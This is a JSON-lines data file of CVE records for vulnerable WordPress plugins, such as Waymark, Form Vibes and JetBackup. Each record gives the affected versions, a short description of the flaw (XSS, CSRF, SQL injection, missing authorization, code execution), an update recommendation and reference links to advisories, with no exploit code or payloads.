{"CVE_ID":"CVE-2024-12325","slug":"waymark","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Waymark plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018content\u2019 parameter in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1457\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1457\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1458\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1458\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1531\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1531\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1532\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1532\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205103\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205103\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4f24b32-58a0-4b10-b8ff-65e574966b6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4f24b32-58a0-4b10-b8ff-65e574966b6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12100","slug":"bitcoin-lightning-publisher","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Bitcoin Lightning Publisher for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bitcoin-lightning-publisher\\\/tags\\\/1.4.1\\\/includes\\\/db\\\/transactions.php#L212\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bitcoin-lightning-publisher\\\/tags\\\/1.4.1\\\/includes\\\/db\\\/transactions.php#L212\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211584%40bitcoin-lightning-publisher&new=3211584%40bitcoin-lightning-publisher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211584%40bitcoin-lightning-publisher&new=3211584%40bitcoin-lightning-publisher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d204ed58-efb2-4383-aa0f-cbad0bae4d02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d204ed58-efb2-4383-aa0f-cbad0bae4d02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45636","slug":"wp-migration-duplicator","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"Missing Authorization vulnerability in WebToffee WordPress Backup & Migration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Backup & Migration: from n\/a through 1.4.1.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-wordpress-backup-migration-plugin-1-4-1-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-wordpress-backup-migration-plugin-1-4-1-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51372","slug":"hashbar-wp-notification-bar","versionEndExcluding":"1.4.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HasThemes HashBar \u2013 WordPress Notification Bar allows Stored XSS.This issue affects HashBar \u2013 WordPress Notification Bar: from n\/a through 1.4.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/hashbar-wp-notification-bar\\\/wordpress-hashbar-wordpress-notification-bar-plugin-1-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/hashbar-wp-notification-bar\\\/wordpress-hashbar-wordpress-notification-bar-plugin-1-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11813","slug":"amin-chat-button","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Pulsating Chat Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6. This is due to missing or incorrect nonce validation on the amin_chat_button_settings_page() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amin-chat-button\\\/trunk\\\/chat-button.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amin-chat-button\\\/trunk\\\/chat-button.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cea8295b-b4be-4a95-9137-ad2033a5169d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cea8295b-b4be-4a95-9137-ad2033a5169d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10114","slug":"woosidebars","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"A vulnerability, which was classified as problematic, has been found in WooSidebars Plugin up to 1.4.1 on WordPress. Affected by this issue is the function enable_custom_post_sidebars of the file classes\/class-woo-sidebars.php. The manipulation of the argument sendback leads to open redirect. The attack may be launched remotely. Upgrading to version 1.4.2 is able to address this issue. The patch is identified as 1ac6d6ac26e185673f95fc1ccc56a392169ba601. It is recommended to upgrade the affected component. VDB-230654 is the identifier assigned to this vulnerability.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/woosidebars\\\/commit\\\/1ac6d6ac26e185673f95fc1ccc56a392169ba601\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/woosidebars\\\/commit\\\/1ac6d6ac26e185673f95fc1ccc56a392169ba601\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230654\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230654\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230654\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230654\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3275","slug":"eroom-zoom-meetings-webinar","versionImpact":"1.4.18","versionEndExcluding":"1.4.19","description":"The eRoom \u2013 Zoom Meetings & Webinars plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.18 via the search_posts function. This makes it possible for authenticated attackers, with subscriber access and higher, to obtain post excerpts including those of draft and pending posts.","recommendation":"Update to version 1.4.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60e0fd59-a69c-4ddf-80cd-4312d2689397?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60e0fd59-a69c-4ddf-80cd-4312d2689397?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3068855%40eroom-zoom-meetings-webinar%2Ftrunk&old=3039151%40eroom-zoom-meetings-webinar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3068855%40eroom-zoom-meetings-webinar%2Ftrunk&old=3039151%40eroom-zoom-meetings-webinar%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4977","slug":"index-wp-mysql-for-speed","versionImpact":"1.4.17","versionEndExcluding":"1.4.18","description":"The Index WP MySQL For Speed WordPress plugin before 1.4.18 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.4.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89791a80-5cff-4a1a-8163-94b5be4081a5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89791a80-5cff-4a1a-8163-94b5be4081a5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5618","slug":"modern-footnotes","versionImpact":"1.4.16","versionEndExcluding":"1.4.17","description":"The Modern Footnotes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in versions up to, and including, 1.4.16 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980695\\\/modern-footnotes\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980695\\\/modern-footnotes\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c20c674f-54b5-470f-b470-07a63501eb4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c20c674f-54b5-470f-b470-07a63501eb4d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12680","slug":"google-website-translator","versionImpact":"1.4.13","versionEndExcluding":"1.4.14","description":"The Prisna GWT  WordPress plugin before 1.4.14 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.4.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28537fbc-3c2b-40c1-85f0-8b5f94eaad51\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28537fbc-3c2b-40c1-85f0-8b5f94eaad51\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12679","slug":"google-website-translator","versionImpact":"1.4.13","versionEndExcluding":"1.4.14","description":"The Prisna GWT  WordPress plugin before 1.4.14 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.4.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ca1438f-4269-4e34-be4a-766276a9f016\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ca1438f-4269-4e34-be4a-766276a9f016\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4151","slug":"agile-store-locator","versionEndExcluding":"1.4.13","description":"The Store Locator WordPress plugin before 1.4.13 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9d80aa4-a26d-4b3f-b7bf-9d2fb0560d7b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9d80aa4-a26d-4b3f-b7bf-9d2fb0560d7b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5309","slug":"form-vibes","versionImpact":"1.4.12","versionEndExcluding":"1.4.13","description":"The Form Vibes \u2013 Database Manager for Forms plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the fv_export_csv, reset_settings, save_settings, save_columns_settings, get_analytics_data, get_event_logs_data, delete_submissions, and get_submissions functions in all versions up to, and including, 1.4.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform multiple unauthorized actions. NOTE: This vulnerability is partially fixed in version 1.4.12.","recommendation":"Update to version 1.4.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aba88c4c-93a4-4c1c-b239-68b5fec87146?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aba88c4c-93a4-4c1c-b239-68b5fec87146?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3128705%40form-vibes&new=3128705%40form-vibes&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3128705%40form-vibes&new=3128705%40form-vibes&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5125","slug":"dd-post-carousel","versionImpact":"1.4.11","versionEndExcluding":"1.4.12","description":"The Custom Post Carousels with Owl WordPress plugin before 1.4.12 uses the featherlight library and makes use of the data-featherlight attribute without sanitizing before using it.","recommendation":"Update to version 1.4.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aaf9e3f8-b312-432d-a635-6fe89ff8d13f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aaf9e3f8-b312-432d-a635-6fe89ff8d13f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2384","slug":"woocommerce-pos","versionImpact":"1.4.11","versionEndExcluding":"1.4.12","description":"The WooCommerce POS plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.4.11. This is due to the plugin not properly verifying the authentication and authorization of the current user This makes it possible for authenticated attackers, with customer-level access and above, to view potentially sensitive information about other users by leveraging their order id","recommendation":"Update to version 1.4.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6b8ba69-aa8b-436f-990c-39e283f5d2f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6b8ba69-aa8b-436f-990c-39e283f5d2f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3053833%40woocommerce-pos&new=3053833%40woocommerce-pos&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3053833%40woocommerce-pos&new=3053833%40woocommerce-pos&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8514","slug":"google-website-translator","versionImpact":"1.4.11","versionEndExcluding":"1.4.12","description":"The Prisna GWT \u2013 Google Website Translator plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.11 via deserialization of untrusted input from the 'prisna_import' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.4.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4183c3f7-7794-45f3-8fad-b87ffec3639c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4183c3f7-7794-45f3-8fad-b87ffec3639c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-website-translator\\\/tags\\\/1.4.11\\\/classes\\\/admin.class.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-website-translator\\\/tags\\\/1.4.11\\\/classes\\\/admin.class.php#L267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155285\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155285\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1690","slug":"woo-wallet","versionImpact":"1.4.10","versionEndExcluding":"1.4.11","description":"The TeraWallet \u2013 Best WooCommerce Wallet System With Cashback Rewards, Partial Payment, Wallet Refunds plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the terawallet_export_user_search() function in all versions up to, and including, 1.4.10. This makes it possible for authenticated attackers, with subscriber-level access and above, to export a list of registered users and their emails.","recommendation":"Update to version 1.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e24a2e-cbc6-4285-b846-bea513b6ff69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e24a2e-cbc6-4285-b846-bea513b6ff69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3043412\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3043412\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5325","slug":"form-vibes","versionImpact":"1.4.10","versionEndExcluding":"1.4.11","description":"The Form Vibes plugin for WordPress is vulnerable to SQL Injection via the \u2018fv_export_data\u2019 parameter in all versions up to, and including, 1.4.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3311097-d477-441e-9bf3-3f991a9b6af9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3311097-d477-441e-9bf3-3f991a9b6af9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115288\\\/form-vibes\\\/trunk\\\/inc\\\/classes\\\/query.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115288\\\/form-vibes\\\/trunk\\\/inc\\\/classes\\\/query.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5545","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.9","versionEndExcluding":"1.4.11","description":"The Motors \u2013 Car Dealer, Classifieds & Listing plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the stm_edit_delete_user_car function in all versions up to, and including, 1.4.8. This makes it possible for unauthenticated attackers to unpublish arbitrary posts and pages.","recommendation":"Update to version 1.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62731e0e-8843-4f79-b887-c595fbefae26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62731e0e-8843-4f79-b887-c595fbefae26?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3106579%40motors-car-dealership-classified-listings%2Ftrunk&old=3101090%40motors-car-dealership-classified-listings%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3106579%40motors-car-dealership-classified-listings%2Ftrunk&old=3101090%40motors-car-dealership-classified-listings%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-27618","slug":"agile-store-locator","versionEndExcluding":"1.4.10","description":"Auth. (editor+) Stored Cross-Site Scripting (XSS) vulnerability in AGILELOGIX Store Locator WordPress plugin <=\u00a01.4.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/agile-store-locator\\\/wordpress-store-locator-wordpress-plugin-1-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/agile-store-locator\\\/wordpress-store-locator-wordpress-plugin-1-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13808","slug":"xpro-elementor-addons-pro","versionImpact":"1.4.9","versionEndExcluding":"1.4.10","description":"The Xpro Elementor Addons - Pro plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.4.9 via the custom PHP widget. This is due to their only being client side controls when determining who can access the widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.","recommendation":"Update to version 1.4.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/elementor.wpxpro.com\",\"name\":\"https:\\\/\\\/elementor.wpxpro.com\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0833e55f-22aa-44c9-aff6-1f3b74016e4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0833e55f-22aa-44c9-aff6-1f3b74016e4c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6556","slug":"woocommerce-currency-switcher","versionImpact":"1.4.1.6","versionEndExcluding":"1.4.1.7","description":"The FOX \u2013 Currency Switcher Professional for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via currency options in all versions up to, and including, 1.4.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cb37019-33f6-4f72-adfc-befbfbf69e47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cb37019-33f6-4f72-adfc-befbfbf69e47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/trunk\\\/classes\\\/smart-designer.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/trunk\\\/classes\\\/smart-designer.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/trunk\\\/classes\\\/smart-designer.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/trunk\\\/classes\\\/smart-designer.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3012135%40woocommerce-currency-switcher&new=3012135%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3012135%40woocommerce-currency-switcher&new=3012135%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36668","slug":"backup","versionEndExcluding":"1.4.1","description":"The JetBackup \u2013 WP Backup, Migrate & Restore plugin for WordPress is vulnerable to sensitive information disclosure in versions up to, and including, 1.4.0 due to a lack of proper capability checking on the backup_guard_get_manual_modal function called via an AJAX action. This makes it possible for subscriber-level attackers, and above, to invoke the function and obtain database table information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2348984%40backup&new=2348984%40backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2348984%40backup&new=2348984%40backup&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e2a9d71-21ef-45a1-99ed-477066ce9620\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e2a9d71-21ef-45a1-99ed-477066ce9620\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36667","slug":"backup","versionEndExcluding":"1.4.1","description":"The JetBackup \u2013 WP Backup, Migrate & Restore plugin for WordPress is vulnerable to unauthorized back-up location changes in versions up to, and including 1.4.1 due to a lack of proper capability checking on the backup_guard_cloud_dropbox, backup_guard_cloud_gdrive, and backup_guard_cloud_oneDrive functions. This makes it possible for authenticated attackers, with minimal permissions, such as a subscriber to change to location of back-ups and potentially steal sensitive information from them.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59532447-1d74-4d34-85f5-d89b65a001d8\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59532447-1d74-4d34-85f5-d89b65a001d8\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2348984%40backup&new=2348984%40backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2348984%40backup&new=2348984%40backup&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
